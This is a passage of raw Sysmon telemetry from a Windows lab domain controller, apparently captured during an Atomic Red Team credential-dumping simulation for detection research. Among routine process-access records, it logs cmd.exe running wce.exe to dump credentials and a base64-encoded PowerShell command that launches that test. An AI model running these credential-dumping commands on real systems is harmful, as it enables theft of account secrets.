fad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.550{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %%temp%%\wce-output.txt" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0901-000000008801}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0901-000000008801}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7CDA-5FA1-0801-000000008801}42802248C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDA-5FA1-0901-000000008801}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.442{D28789B6-7CDA-5FA1-0901-000000008801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDA-5FA1-0801-000000008801}4280C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0801-000000008801}4280C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0801-000000008801}4280C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7CDA-5FA1-0701-000000008801}26002816C:\Windows\system32\cmd.exe{D28789B6-7CDA-5FA1-0801-000000008801}4280C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.438{D28789B6-7CDA-5FA1-0801-000000008801}4280C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT 